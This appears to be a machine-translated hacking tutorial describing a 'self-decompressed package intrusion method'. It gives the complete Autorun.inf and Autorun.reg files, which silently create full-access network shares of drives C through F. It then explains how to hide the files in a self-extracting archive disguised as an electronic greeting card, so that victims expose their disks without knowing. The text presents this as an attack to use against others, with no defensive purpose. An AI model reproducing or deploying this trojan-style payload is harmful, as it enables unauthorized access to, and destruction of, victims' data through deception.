I believe everyone will use a self-decompressed package to delete others' hard disks. I would like to introduce you to the self-decompressed package intrusion method.
If you bind a Trojan to someone else, anyone with a little knowledge can detect it if they have anti-virus software. If you do not need Trojans, you can use batch bombs, fragment object files, or self-import registry files to launch various attacks.
Save the following two rows as Autorun. inf
[Autorun]
Open = regedit/s Autorun. reg
Save the following section as Autorun. reg
REGEDIT4
[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Network \ Lanman \ c $]
"Path" = "c :\\"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000192
"Parm1enc" = hex:
"Parm2enc" = hex:
[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Network \ Lanman \ D $]
"Path" = "D :\\"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000192
"Parm1enc" = hex:
"Parm2enc" = hex:
[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Network \ Lanman \ E $]
"Path" = "E :\\"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000192
"Parm1enc" = hex:
"Parm2enc" = hex:
[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Network \ Lanman \ F $]
"Path" = "F :\\"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000192
"Parm1enc" = hex:
"Parm2enc" = hex:
For example, in today's era of electronic greeting cards, you can name your self-resolution package "monkey year greeting card", pack a real greeting card in the bag, and pack the above two files in by the way, note that you need to specify the file unpacking path. When the recipient clicks the self-decompressed package, the two files are quietly removed to the specified location. Autorun. inf must be removed from the root directory of a partition. The name cannot be changed. You can set the file hiding attribute.
The Autorun. reg file name and release directory can be any one, which can be better hidden. Note that Autorun. inf points to the correct directory.
When the victim double-click a partition with Autorun. inf, the C, D, E, and F partitions on the hard disk are shared.